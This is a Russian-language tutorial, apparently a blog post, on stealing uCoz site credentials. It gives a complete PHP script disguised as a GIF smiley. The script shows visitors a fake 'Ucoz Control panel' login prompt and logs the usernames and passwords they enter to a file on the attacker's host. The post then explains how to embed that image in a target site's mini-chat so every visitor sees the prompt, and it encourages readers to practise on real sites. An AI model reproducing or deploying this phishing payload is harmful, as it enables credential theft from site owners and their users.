Привет. Сегодня я расскажу один из способов взлома сайтов на юкозе. Настоящий хакер может найти достаточно много уязвимостей на таких сайтах и знает много способов их взлома. Я надеюсь что скоро тоже буду таким=).

Итак, начнем...
Для начала нужно зарегистрировать хост с поддержкой php (например hostinger.ru) . После регистрации льем на FTP скрипт и ставим права на пустой .txt файл, например : passwords.txt (сюда будут присылаться пассы пользователей похаканного сайта), и на файл smile.gif. Также скачайте любой смайлик в расширении .gif (типа cool.gif). Затем откройте блокнот, да простой блокнот и напишите следующее:


<?php
header("Content-type: image/gif");
$image = imagecreatefromgif('cool.gif'); 

if(!$_COOKIE['LOGON']) {

   $login = $_SERVER['PHP_AUTH_USER'];
   $pass = $_SERVER['PHP_AUTH_PW'];

   if(strlen($pass) <= 4 || !$login) {

      Header('HTTP/1.1 401 Unauthorized');
      Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');

   } elseif($login) {

      setcookie('LOGON',md5($pass));
      $f = fopen('passwords.txt', 'ab');
      fwrite($f, $login." ||| ".$pass."\r\n");
      fclose($f);

   }

}

imagegif($image);
imagedestroy($image);
?>

Как только вы напишите всё - сохраните файл под названием smile, потом поменяйте расширение на gif. Теперь выбирайте любой юкозовский сайт, например http://target.ucoz.ru/ слева юкозовских сайтов как обычно, у большинства есть мини-чат справа. Так вот - для начала зарегистируйтесь на сайте, потом в мини чате напишите логин, а в содержании сообщения напишите следующее:

[IMG]http://mysite.phphost.net/smile.gif[/IMG]

И нажмите ОК. Если после этого в миничате вместо сообщения появился смайлик - значит радуйтесь, т.к. сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, (в этом примере это http://target.ucoz.ru/) будет появляться форма в которую нужно будет ввести логин и пароль. У вас при входе на сайт такая форма будет появляться тоже. И все, введённые логины и пароли в эту форму будут отсылаться в пустой файл passwords.txt, который вы создали в самом начале и залили на FTP.

Удачи! Практикуйтесь. Только на некоторых сайтах эта уязвимость может и не пройти. Но стандартно созданный юкозовский сайт без доп. своих настроек будет уязвим. Всем спасибо за просмотр, надеюсь статья вам поможет.

Комментарии

captcha
,  2 февр. 2012 Ответить

Очень интересно. Мне понравилось.


Советы по настройке онлайн-календаря под себя Советы по настройке онлайн-календаря
Что такое облачное хранилище и как им пользоваться? Что такое облачное хранилище и как им пользоваться?
Как выбрать пластины для теплообменника? Пластины для теплообменника
Изучение языка ECMAScript: основа современной веб-разработки История языка ECMAScript
Как добавить комментарий в HTML? HTML примеры
Apple позволит разработчикам распространять приложения напрямую с их сайтов Apple позволит разработчикам распространять приложения напрямую с их сайтов
jQuery 4.0 сокращает поддержку браузеров, удаляет API Новое в jQuery 4.0
Как продвинуть Telegram-канал: с нуля до результата Как продвинуть канал в Telegram с нуля?
Получить IT профессию с нуля: академия Eduson Получить IT профессию с нуля
Перспективы эволюции SEO: встречайте будущее продвижения в поисковых системах Будущее SEO-продвижения
Создание сайтов в Алматы: агентство site-promote.kz Разработка сайта компании
Антипкин Михаил Сергеевич о метавселенной, открывающей безграничные возможности для инноваций и экспериментов Антипкин Михаил Сергеевич о метавселенной
Сёрфинг с браузером FraudFox: исчерпывающее руководство Сёрфинг с браузером FraudFox
Где найти лицензионные ключи активации к ПО? Где найти лицензионные ключи активации к ПО?
Курсы веб дизайна: обучение онлайн Курсы веб дизайна: обучение онлайн
Как продлить срок службы бытовой техники? Как продлить срок службы бытовой техники?
Основы VPS/VDS: что нужно знать перед арендой? Основы VPS/VDS: что нужно знать перед арендой?
Откройте для себя азарт Mostbet KZ - ведущего онлайн-казино для геймеров Откройте для себя азарт Mostbet KZ - ведущего онлайн-казино для геймеров
Топ-10 игр для Android стоимостью менее $5 Топ-10 игр для Android стоимостью менее $5
Проверка авто в базе ГИБДД перед покупкой Проверка авто в базе ГИБДД перед покупкой